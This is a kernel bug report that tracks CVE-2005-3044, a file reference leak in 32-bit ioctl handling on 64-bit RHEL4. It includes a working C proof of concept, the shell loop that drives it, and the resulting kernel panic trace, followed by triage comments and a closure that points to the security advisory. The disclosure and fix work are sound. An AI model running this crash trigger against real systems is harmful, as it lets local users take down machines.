SWsoft Virtuozzo/OpenVZ Linux kernel team would like to note that first part of CVE-2005-3044 "fput in a 32-bit ioctl on 64-bit x86 systems" is still not fixed in RHEL4 kernel 2.6.9-42.0.8. As a result local users are able to cause a denial of service. The following patch fixes this problem in linux mainstream: http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=35311d6478077f7bfe35c1c653193e658bf32686 The follwong script demonstrates the resource leakage: [vvs@dhcp17-60 ~]$ uname -a Linux dhcp17-60.qa.sw.ru 2.6.9-42.0.8.EL #1 Tue Jan 23 12:34:49 EST 2007 x86_64 x86_64 x86_64 GNU/Linux [vvs@dhcp17-60 ~]$ id uid=500(vvs) gid=500(vvs) groups=500(vvs) context=user_u:system_r:unconfined_t [vvs@dhcp17-60 ~]$ cat tiocgdev.c #include <stdio.h> #include <sys/ioctl.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #define TIOCGDEV _IOR('T',0x32, unsigned int) int main(int argc, char *argv[]) { int fd, ret; fd = open(argv[0], O_RDONLY); if (fd < 0) { perror("open"); return 1; } ret = ioctl(fd, TIOCGDEV, NULL); if (ret < 0) { perror("ioctl"); return 1; } return 0; } [vvs@dhcp17-60 ~]$ gcc -m32 -o tiocgdev32 tiocgdev.c --static [vvs@dhcp17-60 ~]$ cat /proc/sys/fs/file-nr 528 0 24581 [vvs@dhcp17-60 ~]$ for i in `seq 1 10000` ; do ./tiocgdev32 &>/dev/null ; done [vvs@dhcp17-60 ~]$ cat /proc/sys/fs/file-nr 10452 0 24581 Exploit owerflows the file->f_count and crashes the node: Unable to handle kernel NULL pointer dereference at 0000000000000038 RIP: <ffffffff80199606>{vfs_getattr+24} PML4 5cf1067 PGD 8765067 PMD 0 Oops: 0000 [1] CPU 0 Modules linked in: md5 ipv6 parport_pc lp parport autofs4 sunrpc ds yenta_socket pcmcia_core ipt_REJECT ipt_state ip_conntrack iptable_filter ip_tables dm_mirror button battery ac uhci_hcd snd_ens1371 snd_rawmidi snd_seq_device snd_pcm_oss snd_mixer_oss snd_pcm snd_timer snd_page_alloc snd_ac97_codec snd soundcore e1000 floppy ext3 jbd dm_mod mptscsih mptsas mptspi mptfc mptscsi mptbase sd_mod scsi_mod Pid: 3753, comm: tiocgdev32 Not tainted 2.6.9-42.0.8.EL RIP: 0010:[<ffffffff80199606>] <ffffffff80199606>{vfs_getattr+24} RSP: 0000:0000010008e69ea8 EFLAGS: 00010206 RAX: ffffffff80449cc0 RBX: 0000000000000000 RCX: 0000010008ec8148 RDX: 0000010008e69ef8 RSI: 0000000000000000 RDI: 0000000000000000 RBP: 0000010008e69ef8 R08: 0000010008ec8140 R09: 00000000ffffd854 R10: 0000010008e68000 R11: 0000000000000000 R12: 0000010008e69ef8 R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000 FS: 0000002a96a2d2a0(0000) GS:ffffffff80545480(0000) knlGS:00000000f7ff58e0 CS: 0010 DS: 002b ES: 002b CR0: 000000008005003b CR2: 0000000000000038 CR3: 0000000000101000 CR4: 00000000000006e0 Process tiocgdev32 (pid: 3753, threadinfo 0000010008e68000, task 0000010009020030) Stack: 0000010008ec8140 000001000929dcc0 00000000fffffff7 0000010008e69ef8 0000000000000000 ffffffff80199738 00000000ffffd7a8 00000000ffffd854 0000000000000000 ffffffff80127e9f Call Trace:<ffffffff80199738>{vfs_fstat+41} <ffffffff80127e9f>{sys32_fstat64+17} <ffffffff801c2587>{compat_sys_ioctl+906} <ffffffff8018dbbb>{sys_write+69} <ffffffff80127991>{ia32_sysret+0} Code: 4c 8b 66 38 ff 90 a0 01 00 00 85 c0 75 6e 49 8b 84 24 70 01 RIP <ffffffff80199606>{vfs_getattr+24} RSP <0000010008e69ea8> CR2: 0000000000000038 <0>Kernel panic - not syncing: Oops
Ok, so this is a dup of Bug 227978 for z-stream? If so maybe Jeff should take it, since he did the original work in the other bug? I'm happy to ferry this in for z-stream, but it seems like "his" bug, so I'll give him first carck at it. :) -Eric
Talked with Jeff... over to him since he did the original work. -Eric
committed in stream rhel‑4.5.z build 55.0.1
An advisory has been issued which should help the problem described in this bug report. This report is therefore being closed with a resolution of ERRATA. For more information on the solution and/or where to find the updated files, please follow the link below. You may reopen this bug report if the solution does not work for you. http://rhn.redhat.com/errata/RHSA-2007-0488.html